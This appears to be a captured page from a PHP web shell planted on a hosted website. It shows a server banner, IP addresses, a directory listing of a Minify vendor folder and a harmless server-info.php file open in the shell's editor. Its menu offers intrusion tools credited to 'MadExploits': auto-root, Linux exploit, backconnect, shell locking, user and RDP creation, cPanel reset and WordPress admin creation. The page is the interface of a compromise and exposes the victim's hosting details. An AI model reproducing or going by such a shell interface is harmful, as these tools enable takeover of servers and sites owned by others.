Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
vendor /
mrclay /
minify /
min /
[ HOME SHELL ]
Name
Size
Permission
Action
builder
[ DIR ]
drwx---r-x
lib
[ DIR ]
drwx---r-x
.htaccess
307
B
-rw----r--
config-test.php
292
B
-rw----r--
config.php
6.43
KB
-rw----r--
groupsConfig.php
416
B
-rw----r--
index.php
2.32
KB
-rw----r--
quick-test.css
548
B
-rw----r--
quick-test.js
2.75
KB
-rw----r--
server-info.php
642
B
-rw----r--
utils.php
2.68
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : server-info.php
<?php /** * Reports server info useful in configuring the options $min_documentRoot, $min_symlinks, * and $min_serveOptions['minApp']['allowDirs']. * * Change to true to expose this info. */ $enabled = false; /////////////////////// if (!$enabled) { die('Set $enabled to true to see server info.'); } header('Content-Type: text/plain'); $file = __FILE__; $tmp = sys_get_temp_dir(); echo <<<EOD __FILE__ : $file SCRIPT_FILENAME : {$_SERVER['SCRIPT_FILENAME']} DOCUMENT_ROOT : {$_SERVER['DOCUMENT_ROOT']} SCRIPT_NAME : {$_SERVER['SCRIPT_NAME']} REQUEST_URI : {$_SERVER['REQUEST_URI']} Cache directory : $tmp EOD;
Close